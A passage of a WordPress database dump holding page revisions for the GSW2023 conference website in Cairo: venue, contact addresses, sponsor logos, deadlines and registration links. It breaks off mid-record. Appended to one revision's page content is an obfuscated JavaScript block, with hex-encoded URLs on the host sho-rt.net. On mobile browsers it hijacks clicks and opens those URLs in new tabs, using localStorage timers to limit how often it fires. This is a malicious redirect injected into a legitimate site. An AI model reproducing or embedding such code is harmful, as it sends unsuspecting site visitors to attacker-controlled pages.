bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:41:17','2023-05-16 01:41:17','',3066,'https://gsw2023.com/?p=4487',0,'revision','',0),
(4488,1,'2023-05-16 01:41:32','2023-05-16 01:41:32','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201255295{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 size-medium\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"300\" height=\"91\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p 